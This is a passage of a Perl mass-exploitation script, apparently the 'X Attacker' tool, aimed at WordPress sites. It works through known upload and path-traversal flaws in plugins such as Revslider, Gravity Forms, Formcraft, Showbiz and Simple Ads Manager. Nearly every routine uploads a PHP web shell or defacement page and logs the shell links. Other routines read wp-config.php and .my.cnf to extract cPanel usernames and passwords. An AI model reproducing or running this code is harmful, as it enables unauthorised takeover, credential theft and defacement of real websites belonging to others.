 358 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [file => ["XAttacker.php"],]);
 359 | 
 360 | $cherryup="$site/wp-content/plugins/cherry-plugin/admin/import-export/XAttacker.php?X=Attacker";
 361 | 
 362 | my $checkcherry = $ua->get("$cherryup")->content;
 363 | if($checkcherry =~/X Attacker/) {
 364 | print color('bold red'),"[";
 365 | print color('bold green'),"+";
 366 | print color('bold red'),"] ";
 367 | print color('bold white'),"Cherry Plugin";
 368 | print color('bold white')," ..................... ";
 369 | print color('bold white'),"";
 370 | print color('bold green'),"VULN";
 371 | print color('bold white'),"\n";
 372 | print color('bold green')," [";
 373 | print color('bold red'),"+";
 374 | print color('bold green'),"] ";
 375 | print color('bold white'),"Shell Uploaded Successfully\n";
 376 | print color('bold white'),"  [Link] => $cherryup\n";
 377 | open (TEXT, '>>Result/Shells.txt');
 378 | print TEXT "$cherryup\n";
 379 | close (TEXT);
 380 | }else{
 381 | print color('bold red'),"[";
 382 | print color('bold green'),"+";
 383 | print color('bold red'),"] ";
 384 | print color('bold white'),"Cherry Plugin";
 385 | print color('bold white')," ..................... ";
 386 | print color('bold red'),"NOt VULN";
 387 | print color('bold white'),"\n";
 388 | }
 389 | }
 390 | 
 391 | ################ Download Manager #####################
 392 | sub downloadsmanager(){
 393 | $downloadsmanagervuln="$site/wp-content/plugins/downloads-manager/readme.txt";
 394 | my $url = "$site";
 395 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [upfile => ["XAttacker.php"], dm_upload => '',]);
 396 | $dmup="$site/wp-content/plugins/downloads-manager/upload/XAttacker.php?X=Attacker";
 397 | my $checkdm = $ua->get("$dmup")->content;
 398 | if($checkdm =~/X Attacker/) {
 399 | print color('bold red'),"[";
 400 | print color('bold green'),"+";
 401 | print color('bold red'),"] ";
 402 | print color('bold white'),"Download Manager";
 403 | print color('bold white')," .................. ";
 404 | print color('bold green'),"VULN";
 405 | print color('bold white'),"\n";
 406 | print color('bold green')," [";
 407 | print color('bold red'),"+";
 408 | print color('bold green'),"] ";
 409 | print color('bold white'),"Shell Uploaded Successfully\n";
 410 | print color('bold white'),"  [Link] => $dmup\n";
 411 | open (TEXT, '>>Result/Shells.txt');
 412 | print TEXT "$dmup\n";
 413 | close (TEXT);
 414 | }else{
 415 | print color('bold red'),"[";
 416 | print color('bold green'),"+";
 417 | print color('bold red'),"] ";
 418 | print color('bold white'),"Download Manager";
 419 | print color('bold white')," .................. ";
 420 | print color('bold red'),"NOt VULN";
 421 | print color('bold white'),"\n";
 422 | }
 423 | }
 424 | 
 425 | ################ Formcraft #####################
 426 | sub formcraft(){
 427 | my $url = "$site/wp-content/plugins/formcraft/file-upload/server/php/";
 428 | my $shell ="XAttacker.php";
 429 | my $field_name = "files[]";
 430 | 
 431 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', content => [ $field_name => [$shell]]);
 432 | $formcraftup="$site/wp-content/plugins/formcraft/file-upload/server/php/files/XAttacker.php?X=Attacker";
 433 | 
 434 | if ($response->content =~ /{"files/) {
 435 | print color('bold red'),"[";
 436 | print color('bold green'),"+";
 437 | print color('bold red'),"] ";
 438 | print color('bold white'),"Formcraft";
 439 | print color('bold white')," ......................... ";
 440 | print color('bold green'),"VULN";
 441 | print color('bold white'),"\n";
 442 | print color('bold green')," [";
 443 | print color('bold red'),"+";
 444 | print color('bold green'),"] ";
 445 | print color('bold white'),"Shell Uploaded Successfully\n";
 446 | print color('bold white'),"  [Link] => $formcraftup\n";
 447 | open (TEXT, '>>Result/Shells.txt');
 448 | print TEXT "$formcraftup\n";
 449 | close (TEXT);
 450 | }else{
 451 | print color('bold red'),"[";
 452 | print color('bold green'),"+";
 453 | print color('bold red'),"] ";
 454 | print color('bold white'),"Formcraft";
 455 | print color('bold white')," ......................... ";
 456 | print color('bold red'),"NOt VULN";
 457 | print color('bold white'),"\n";
 458 | }
 459 | }
 460 | 
 461 | ################ Power Zoomer #####################
 462 | sub powerzoomer(){ 
 463 | my $url = "$site/wp-admin/admin.php?page=powerzoomer_manage";
 464 | 
 465 | my $response = $ua->post($url, Content_Type => 'multipart/form-data', Content => [album_img => ["XAttacker.php"], task => 'pwz_add_new_album', album_name => '', album_desc => '',]);
 466 | 
 467 | if ($response->content =~ /\/uploads\/powerzoomer\/(.*?)\/big\/XAttacker.php/) {
 468 | $uploadfolder=$1;
 469 | $zoomerup="$site/wp-content/uploads/powerzoomer/$uploadfolder/big/XAttacker.php?X=Attacker";
 470 | print color('bold red'),"[";
 471 | print color('bold green'),"+";
 472 | print color('bold red'),"] ";
 473 | print color('bold white'),"Power Zoomer";
 474 | print color('bold white')," ...................... ";
 475 | print color('bold green'),"VULN";
 476 | print color('bold white'),"\n";
 477 | print color('bold green')," [";
 478 | print color('bold red'),"+";
 479 | print color('bold green'),"] ";
 480 | print color('bold white'),"Shell Uploaded Successfully\n";
 481 | print color('bold white'),"  [Link] => $zoomerup\n";
 482 | open (TEXT, '>>Result/Shells.txt');
 483 | print TEXT "$zoomerup\n";
 484 | close (TEXT);
 485 | }else{
 486 | print color('bold red'),"[";
 487 | print color('bold green'),"+";
 488 | print color('bold red'),"] ";
 489 | print color('bold white'),"Power Zoomer";
 490 | print color('bold white')," ...................... ";
 491 | print color('bold red'),"NOt VULN";
 492 | print color('bold white'),"\n";
 493 | }
 494 | }
 495 | 
 496 | ################ Gravity Forms #####################
 497 | sub gravityforms(){
 498 | my $url = "$site/?gf_page=upload";
 499 | my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
 500 | $ua->timeout(10);
 501 | $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
 502 | 
 503 | my $gravityformsres = $ua->post($url, Content_Type => "form-data", Content => [file => ["BackDoor.jpg"], field_id => "3", form_id => "1",gform_unique_id => "../../../", name => "css.php.jd"]);
 504 | 
 505 | $gravityformsup = "$site/wp-includes/wp-footer.php?X=Attacker";
 506 | my $check = $ua->get("$site/wp-content/uploads/_input_3_css.php.jd")->content;
 507 | my $checkk = $ua->get("$site/wp-includes/wp-footer.php")->content;
 508 | if($checkk =~/X Attacker/) {
 509 | print color('bold red'),"[";
 510 | print color('bold green'),"+";
 511 | print color('bold red'),"] ";
 512 | print color('bold white'),"Gravity Forms";
 513 | print color('bold white')," ............... ";
 514 | print color('bold green'),"VULN\n";
 515 | print color('bold green')," [";
 516 | print color('bold red'),"+";
 517 | print color('bold green'),"] ";
 518 | print color('bold white'),"Shell Uploaded Successfully\n";
 519 | print color('bold white'),"  [Link] => $gravityformsup\n";
 520 | open (TEXT, '>>Result/Shells.txt');
 521 | print TEXT "$gravityformsup\n";
 522 | close (TEXT);
 523 | }
 524 | else{
 525 | gravityforms2();
 526 | }
 527 | }
 528 | ################ Gravity Forms #####################
 529 | sub gravityforms2(){
 530 | my $url = "$site/?gf_page=upload";
 531 | my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
 532 | $ua->timeout(10);
 533 | $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
 534 | 
 535 | my $gravityformsres2 = $ua->post($url, Content_Type => 'multipart/form-data', Content => [file => ["index.jpg"], form_id => '1', name => 'Psyco.html', gform_unique_id => '../../../../../', field_id => '3',]);
 536 | $gravityformsupp = "$site/_input_3_Psyco.html";
 537 | my $checkgravityformsupp = $ua->get("$gravityformsupp")->content;
 538 | if ($checkgravityformsupp =~ /HaCKeD/) {
 539 | 
 540 | print color('bold red'),"[";
 541 | print color('bold green'),"+";
 542 | print color('bold red'),"] ";
 543 | print color('bold white'),"Gravity Forms";
 544 | print color('bold white')," ............... ";
 545 | print color('bold green'),"VULN\n";
 546 | print color('bold green'),"  [";
 547 | print color('bold red'),"-";
 548 | print color('bold green'),"] ";
 549 | print color('bold red'),"Shell Not Uploaded\n";
 550 | print color('bold green'),"  [";
 551 | print color('bold red'),"-";
 552 | print color('bold green'),"] ";
 553 | print color('bold white'),"Index Uploaded Successfully\n";
 554 | print color('bold white'),"  [Link] => $gravityformsupp\n";
 555 | open (TEXT, '>>Result/index.txt');
 556 | print TEXT "$gravityformsupp\n";
 557 | close (TEXT);
 558 | 
 559 | }
 560 | else{
 561 | print color('bold red'),"[";
 562 | print color('bold green'),"+";
 563 | print color('bold red'),"] ";
 564 | print color('bold white'),"Gravity Forms";
 565 | print color('bold white')," ..................... ";
 566 | print color('bold red'),"NOt VULN";
 567 | print color('bold white'),"\n";
 568 | }
 569 | }
 570 | 
 571 | ################ Revslider upload shell #####################
 572 | sub revslider(){
 573 | 
 574 | my $url = "$site/wp-admin/admin-ajax.php";
 575 | 
 576 | my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
 577 | $ua->timeout(10);
 578 | $ua->agent("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31");
 579 | 
 580 | my $revslidres = $ua->post($url, Cookie => "", Content_Type => "form-data", Content => [action => "revslider_ajax_action", client_action => "update_plugin", update_file => ["XAttackerevs.zip"]]);
 581 | 
 582 | my $revs = $ua->get("$site/wp-content/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
 583 | my $revavada = $ua->get("$site/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
 584 | my $revstriking = $ua->get("$site/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
 585 | my $revincredible = $ua->get("$site/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
 586 | my $revultimatum = $ua->get("$site/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
 587 | my $revmedicate = $ua->get("$site/wp-content/themes/medicate/script/revslider/temp/update_extract/revslider/XAttacker.php")->content;
 588 | my $revcentum = $ua->get("$site/wp-content/themes/centum/revslider/temp/update_extract/revslider/XAttacker.php")->content;
 589 | my $revbeachapollo = $ua->get("$site/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
 590 | my $revcuckootap = $ua->get("$site/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
 591 | my $revpindol = $ua->get("$site/wp-content/themes/pindol/revslider/temp/update_extract/revslider/XAttacker.php")->content;
 592 | my $revdesignplus = $ua->get("$site/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
 593 | my $revrarebird = $ua->get("$site/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
 594 | my $revandre = $ua->get("$site/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php")->content;
 595 | 
 596 | if($revs =~ /X Attacker/){
 597 | print color('bold red'),"[";
 598 | print color('bold green'),"+";
 599 | print color('bold red'),"] ";
 600 | print color('bold white'),"Revslider";
 601 | print color('bold white')," ......................... ";
 602 | print color('bold green'),"VULN";
 603 | print color('bold white'),"\n";
 604 | print color('bold green')," [";
 605 | print color('bold red'),"+";
 606 | print color('bold green'),"] ";
 607 | print color('bold white'),"Shell Uploaded Successfully\n";
 608 | print color('bold white'),"  [Link] => $site/wp-content/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
 609 | open (TEXT, '>>Result/Shells.txt');
 610 | print TEXT "$site/wp-content/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
 611 | close (TEXT);
 612 | }
 613 | 
 614 | elsif($revavada =~ /X Attacker/){
 615 | print color('bold red'),"[";
 616 | print color('bold green'),"+";
 617 | print color('bold red'),"] ";
 618 | print color('bold white'),"Revslider";
 619 | print color('bold white')," ......................... ";
 620 | print color('bold green'),"VULN";
 621 | print color('bold white'),"\n";
 622 | print color('bold green')," [";
 623 | print color('bold red'),"+";
 624 | print color('bold green'),"] ";
 625 | print color('bold white'),"Shell Uploaded Successfully\n";
 626 | print color('bold white'),"  [Link] => $site/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
 627 | open (TEXT, '>>Result/Shells.txt');
 628 | print TEXT "$site/wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
 629 | close (TEXT);
 630 | }
 631 | 
 632 | 
 633 | elsif($revstriking =~ /X Attacker/){
 634 | print color('bold red'),"[";
 635 | print color('bold green'),"+";
 636 | print color('bold red'),"] ";
 637 | print color('bold white'),"Revslider";
 638 | print color('bold white')," ......................... ";
 639 | print color('bold green'),"VULN";
 640 | print color('bold white'),"\n";
 641 | print color('bold green')," [";
 642 | print color('bold red'),"+";
 643 | print color('bold green'),"] ";
 644 | print color('bold white'),"Shell Uploaded Successfully\n";
 645 | print color('bold white'),"  [Link] => $site/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
 646 | open (TEXT, '>>Result/Shells.txt');
 647 | print TEXT "$site/wp-content/themes/striking_r/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
 648 | close (TEXT);
 649 | }
 650 | 
 651 | elsif($revincredible =~ /X Attacker/){
 652 | print color('bold red'),"[";
 653 | print color('bold green'),"+";
 654 | print color('bold red'),"] ";
 655 | print color('bold white'),"Revslider";
 656 | print color('bold white')," ......................... ";
 657 | print color('bold green'),"VULN";
 658 | print color('bold white'),"\n";
 659 | print color('bold green')," [";
 660 | print color('bold red'),"+";
 661 | print color('bold green'),"] ";
 662 | print color('bold white'),"Shell Uploaded Successfully\n";
 663 | print color('bold white'),"  [Link] => $site/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
 664 | open (TEXT, '>>Result/Shells.txt');
 665 | print TEXT "$site/wp-content/themes/IncredibleWP/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
 666 | close (TEXT);
 667 | }
 668 | 
 669 | elsif($revmedicate =~ /X Attacker/){
 670 | print color('bold red'),"[";
 671 | print color('bold green'),"+";
 672 | print color('bold red'),"] ";
 673 | print color('bold white'),"Revslider";
 674 | print color('bold white')," ......................... ";
 675 | print color('bold green'),"VULN";
 676 | print color('bold white'),"\n";
 677 | print color('bold green')," [";
 678 | print color('bold red'),"+";
 679 | print color('bold green'),"] ";
 680 | print color('bold white'),"Shell Uploaded Successfully\n";
 681 | print color('bold white'),"  [Link] => $site/wp-content/themes/medicate/script/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
 682 | open (TEXT, '>>Result/Shells.txt');
 683 | print TEXT "$site$site/wp-content/themes/medicate/script/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
 684 | close (TEXT);
 685 | }
 686 | 
 687 | elsif($revultimatum =~ /X Attacker/){
 688 | print color('bold red'),"[";
 689 | print color('bold green'),"+";
 690 | print color('bold red'),"] ";
 691 | print color('bold white'),"Revslider";
 692 | print color('bold white')," ......................... ";
 693 | print color('bold green'),"VULN";
 694 | print color('bold white'),"\n";
 695 | print color('bold green')," [";
 696 | print color('bold red'),"+";
 697 | print color('bold green'),"] ";
 698 | print color('bold white'),"Shell Uploaded Successfully\n";
 699 | print color('bold white'),"  [Link] => $site/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
 700 | open (TEXT, '>>Result/Shells.txt');
 701 | print TEXT "$site/wp-content/themes/ultimatum/wonderfoundry/addons/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
 702 | close (TEXT);
 703 | }
 704 | 
 705 | elsif($revcentum =~ /X Attacker/){
 706 | print color('bold red'),"[";
 707 | print color('bold green'),"+";
 708 | print color('bold red'),"] ";
 709 | print color('bold white'),"Revslider";
 710 | print color('bold white')," ......................... ";
 711 | print color('bold green'),"VULN";
 712 | print color('bold white'),"\n";
 713 | print color('bold green')," [";
 714 | print color('bold red'),"+";
 715 | print color('bold green'),"] ";
 716 | print color('bold white'),"Shell Uploaded Successfully\n";
 717 | print color('bold white'),"  [Link] => $site/wp-content/themes/centum/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
 718 | open (TEXT, '>>Result/Shells.txt');
 719 | print TEXT "$site/wp-content/themes/centum/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
 720 | close (TEXT);
 721 | }
 722 | 
 723 | elsif($revbeachapollo =~ /X Attacker/){
 724 | print color('bold red'),"[";
 725 | print color('bold green'),"+";
 726 | print color('bold red'),"] ";
 727 | print color('bold white'),"Revslider";
 728 | print color('bold white')," ......................... ";
 729 | print color('bold green'),"VULN";
 730 | print color('bold white'),"\n";
 731 | print color('bold green')," [";
 732 | print color('bold red'),"+";
 733 | print color('bold green'),"] ";
 734 | print color('bold white'),"Shell Uploaded Successfully\n";
 735 | print color('bold white'),"  [Link] => $site/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
 736 | open (TEXT, '>>Result/Shells.txt');
 737 | print TEXT "$site/wp-content/themes/beach_apollo/advance/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
 738 | close (TEXT);
 739 | }
 740 | 
 741 | elsif($revcuckootap =~ /X Attacker/){
 742 | print color('bold red'),"[";
 743 | print color('bold green'),"+";
 744 | print color('bold red'),"] ";
 745 | print color('bold white'),"Revslider";
 746 | print color('bold white')," ......................... ";
 747 | print color('bold green'),"VULN";
 748 | print color('bold white'),"\n";
 749 | print color('bold green')," [";
 750 | print color('bold red'),"+";
 751 | print color('bold green'),"] ";
 752 | print color('bold white'),"Shell Uploaded Successfully\n";
 753 | print color('bold white'),"  [Link] => $site/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
 754 | open (TEXT, '>>Result/Shells.txt');
 755 | print TEXT "$site/wp-content/themes/cuckootap/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
 756 | close (TEXT);
 757 | }
 758 | 
 759 | elsif($revpindol =~ /X Attacker/){
 760 | print color('bold red'),"[";
 761 | print color('bold green'),"+";
 762 | print color('bold red'),"] ";
 763 | print color('bold white'),"Revslider";
 764 | print color('bold white')," ......................... ";
 765 | print color('bold green'),"VULN";
 766 | print color('bold white'),"\n";
 767 | print color('bold green')," [";
 768 | print color('bold red'),"+";
 769 | print color('bold green'),"] ";
 770 | print color('bold white'),"Shell Uploaded Successfully\n";
 771 | print color('bold white'),"  [Link] => $site/wp-content/themes/pindol/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
 772 | open (TEXT, '>>Result/Shells.txt');
 773 | print TEXT "$site/wp-content/themes/pindol/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
 774 | close (TEXT);
 775 | }
 776 | 
 777 | elsif($revdesignplus =~ /X Attacker/){
 778 | print color('bold red'),"[";
 779 | print color('bold green'),"+";
 780 | print color('bold red'),"] ";
 781 | print color('bold white'),"Revslider";
 782 | print color('bold white')," ......................... ";
 783 | print color('bold green'),"VULN";
 784 | print color('bold white'),"\n";
 785 | print color('bold green')," [";
 786 | print color('bold red'),"+";
 787 | print color('bold green'),"] ";
 788 | print color('bold white'),"Shell Uploaded Successfully\n";
 789 | print color('bold white'),"  [Link] => $site/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
 790 | open (TEXT, '>>Result/Shells.txt');
 791 | print TEXT "$site/wp-content/themes/designplus/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
 792 | close (TEXT);
 793 | }
 794 | 
 795 | elsif($revrarebird =~ /X Attacker/){
 796 | print color('bold red'),"[";
 797 | print color('bold green'),"+";
 798 | print color('bold red'),"] ";
 799 | print color('bold white'),"Revslider";
 800 | print color('bold white')," ......................... ";
 801 | print color('bold green'),"VULN";
 802 | print color('bold white'),"\n";
 803 | print color('bold green')," [";
 804 | print color('bold red'),"+";
 805 | print color('bold green'),"] ";
 806 | print color('bold white'),"Shell Uploaded Successfully\n";
 807 | print color('bold white'),"  [Link] => $site/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
 808 | open (TEXT, '>>Result/Shells.txt');
 809 | print TEXT "$site/wp-content/themes/rarebird/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
 810 | close (TEXT);
 811 | }
 812 | 
 813 | elsif($revandre =~ /X Attacker/){
 814 | print color('bold red'),"[";
 815 | print color('bold green'),"+";
 816 | print color('bold red'),"] ";
 817 | print color('bold white'),"Revslider";
 818 | print color('bold white')," ......................... ";
 819 | print color('bold green'),"VULN";
 820 | print color('bold white'),"\n";
 821 | print color('bold green')," [";
 822 | print color('bold red'),"+";
 823 | print color('bold green'),"] ";
 824 | print color('bold white'),"Shell Uploaded Successfully\n";
 825 | print color('bold white'),"  [Link] => $site/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
 826 | open (TEXT, '>>Result/Shells.txt');
 827 | print TEXT "$site/wp-content/themes/andre/framework/plugins/revslider/temp/update_extract/revslider/XAttacker.php?X=Attacker\n";
 828 | close (TEXT);
 829 | }
 830 | 
 831 | else{
 832 | print color('bold red'),"[";
 833 | print color('bold green'),"+";
 834 | print color('bold red'),"] ";
 835 | print color('bold white'),"Revslider Upload Shell";
 836 | print color('bold white')," ............ ";
 837 | print color('bold red'),"NOt VULN";
 838 | print color('bold white'),"\n";
 839 | revsliderajax();
 840 | }
 841 | }
 842 | ################ Revslider ajax #####################
 843 | sub revsliderajax(){
 844 | 
 845 | my $url = "$site/wp-admin/admin-ajax.php";
 846 | 
 847 | my $revslidajaxres = $ua->post($url, Cookie => "", Content_Type => "form-data", Content => [action => "revslider_ajax_action", client_action => "update_captions_css", data => "<body style='color: transparent;background-color: black'><center><h1><b style='color: white'><center><b>HaCKeD BY Mohamed Riahi<b>"]);
 848 | 
 849 | $revsliderajax = $site . '/wp-admin/admin-ajax.php?action=revslider_ajax_action&client_action=get_captions_css';
 850 | 
 851 | my $checkrevsajax = $ua->get("$revsliderajax")->content;
 852 | if($checkrevsajax =~ /HaCKeD/){
 853 | print color('bold red'),"[";
 854 | print color('bold green'),"+";
 855 | print color('bold red'),"] ";
 856 | print color('bold white'),"Revslider Dafece Ajax";
 857 | print color('bold white')," ............. ";
 858 | print color('bold green'),"VULN";
 859 | print color('bold white'),"\n";
 860 | print color('bold green'),"  [";
 861 | print color('bold red'),"-";
 862 | print color('bold green'),"] ";
 863 | print color('bold white'),"Defaced Successfully\n";
 864 | print color('bold white'),"  [Link] => $revsliderajax\n";
 865 | open (TEXT, '>>Result/index.txt');
 866 | print TEXT "$revsliderajax\n";
 867 | close (TEXT);
 868 | }else{
 869 | print color('bold red'),"[";
 870 | print color('bold green'),"+";
 871 | print color('bold red'),"] ";
 872 | print color('bold white'),"Revslider Dafece Ajax";
 873 | print color('bold white')," ............. ";
 874 | print color('bold red'),"NOt VULN";
 875 | print color('bold white'),"\n";
 876 | }
 877 | }
 878 | 
 879 | sub getconfig{
 880 | $url = "$site/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php";
 881 | 
 882 | $resp = $ua->request(HTTP::Request->new(GET => $url ));
 883 | $conttt = $resp->content;
 884 | if($conttt =~ m/DB_NAME/g){
 885 | print color('bold red'),"[";
 886 | print color('bold green'),"+";
 887 | print color('bold red'),"] ";
 888 | print color('bold white'),"Revslider Get Config";
 889 | print color('bold white')," .............. ";
 890 | print color('bold green'),"VULN\n";
 891 |      open(save, '>>Result/Config.txt');   
 892 |     print save "[RevsliderConfig] $url\n";   
 893 |     close(save);
 894 |     getcpconfig();
 895 | }else{
 896 | print color('bold red'),"[";
 897 | print color('bold green'),"+";
 898 | print color('bold red'),"] ";
 899 | print color('bold white'),"Revslider Get Config";
 900 | print color('bold white')," .............. ";
 901 | print color('bold red'),"NOt VULN\n";
 902 | }
 903 | }
 904 | 
 905 | sub getcpconfig{
 906 | $ua = LWP::UserAgent->new(keep_alive => 1);
 907 | $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
 908 | $ua->timeout (10);
 909 | $cpup = "wp-admin/admin-ajax.php?action=revslider_show_image&img=../../.my.cnf";
 910 | $cpuplink = "$site/$cpup";
 911 | $resp = $ua->request(HTTP::Request->new(GET => $cpuplink ));
 912 | $cont = $resp->content;
 913 | if($cont =~ m/user=/g){
 914 | print color('bold red'),"[";
 915 | print color('bold green'),"+";
 916 | print color('bold red'),"] ";
 917 | print color('bold white'),"Revslider Get cPanel";
 918 | print color('bold white')," .............. ";
 919 | print color('bold green'),"VULN\n";
 920 | 
 921 | $resp = $ua->request(HTTP::Request->new(GET => $cpuplink ));
 922 | $contt = $resp->content;
 923 | while($contt =~ m/user/g){
 924 |         if ($contt =~ /user=(.*)/){
 925 | 
 926 | print color('bold green')," [";
 927 | print color('bold red'),"+";
 928 | print color('bold green'),"] ";
 929 | print color('bold white'),"URL : $site/cpanel\n";
 930 | print color('bold green')," [";
 931 | print color('bold red'),"+";
 932 | print color('bold green'),"] ";
 933 | print color('bold white'),"USER : $1\n";
 934 | open (TEXT, '>>Result/cPanel.txt');
 935 | print TEXT "Url : $site\n";
 936 | print TEXT "USER : $1\n";
 937 | close (TEXT);
 938 |         }
 939 |         if ($contt =~ /password="(.*)"/){
 940 |             print color('bold green')," [";
 941 | print color('bold red'),"+";
 942 | print color('bold green'),"] ";
 943 | print color('bold white'),"PASS : $1\n";
 944 | open (TEXT, '>>Result/cPanel.txt');
 945 | print TEXT "PASS : $1\n";
 946 | close (TEXT);
 947 |         }
 948 | 
 949 | 
 950 | }
 951 | }else{
 952 | print color('bold red'),"[";
 953 | print color('bold green'),"+";
 954 | print color('bold red'),"] ";
 955 | print color('bold white'),"Revslider Get cPanel";
 956 | print color('bold white')," .............. ";
 957 | print color('bold red'),"NOt VULN\n";
 958 | }
 959 | }
 960 | 
 961 | ################ Showbiz #####################
 962 | sub showbiz(){
 963 | my $url = "$url/wp-admin/admin-ajax.php";
 964 | sub randomagent {
 965 | my @array = ('Mozilla/5.0 (Windows NT 5.1; rv:31.0) Gecko/20100101 Firefox/31.0',
 966 | 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:29.0) Gecko/20120101 Firefox/29.0',
 967 | 'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)',
 968 | 'Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36',
 969 | 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36',
 970 | 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.63 Safari/537.31'
 971 | );
 972 | my $random = $array[rand @array];
 973 | return($random);
 974 | }
 975 | my $useragent = randomagent();
 976 | 
 977 | my $ua = LWP::UserAgent->new(ssl_opts => { verify_hostname => 0 });
 978 | $ua->timeout(10);
 979 | $ua->agent($useragent);
 980 | my $showbizres = $ua->post($url, Cookie => "", Content_Type => "form-data", Content => [action => "showbiz_ajax_action", client_action => "update_plugin", update_file => ["XAttacker.php"]]);
 981 | 
 982 | $showbizup = $site . '/wp-content/plugins/showbiz/temp/update_extract/XAttacker.php?X=Attacker';
 983 | 
 984 | my $checkshow = $ua->get("$showbizup")->content;
 985 | if($checkshow =~ /X Attacker/){
 986 | print color('bold red'),"[";
 987 | print color('bold green'),"+";
 988 | print color('bold red'),"] ";
 989 | print color('bold white'),"Showbiz";
 990 | print color('bold white')," ........................... ";
 991 | print color('bold green'),"VULN\n";
 992 | print color('bold green')," [";
 993 | print color('bold red'),"+";
 994 | print color('bold green'),"] ";
 995 | print color('bold white'),"Shell Uploaded Successfully\n";
 996 | print color('bold white'),"  [Link] => $showbizup\n";
 997 | open (TEXT, '>>Result/Shells.txt');
 998 | print TEXT "$showbizup\n";
 999 | close (TEXT);
1000 | }else{
1001 | print color('bold red'),"[";
1002 | print color('bold green'),"+";
1003 | print color('bold red'),"] ";
1004 | print color('bold white'),"Showbiz";
1005 | print color('bold white')," ........................... ";
1006 | print color('bold red'),"NOt VULN\n";
1007 | }
1008 | }
1009 | 
1010 | ################ Simple Ads Manager #####################
1011 | sub ads(){  
1012 | my $url = "$site/wp-content/plugins/simple-ads-manager/sam-ajax-admin.php";
1013 | 
1014 | my $adsres = $ua->post($url, Content_Type => 'multipart/form-data', Content => [uploadfile => ["XAttacker.php"], action => 'upload_ad_image', path => '',]);
1015 | $adsup="$site/wp-content/plugins/simple-ads-manager/XAttacker.php?X=Attacker";
1016 | if ($adsres->content =~ /{"status":"success"}/) {
1017 | print color('bold red'),"[";
1018 | print color('bold green'),"+";
1019 | print color('bold red'),"] ";
1020 | print color('bold white'),"Simple Ads Manager";
1021 | print color('bold white')," ................ ";
1022 | print color('bold green'),"VULN\n";
1023 | print color('bold green')," [";
1024 | print color('bold red'),"+";
1025 | print color('bold green'),"] ";
1026 | print color('bold white'),"Shell Uploaded Successfully\n";
1027 | print color('bold white'),"  [Link] => $adsup\n";
1028 | open (TEXT, '>>Result/Shells.txt');
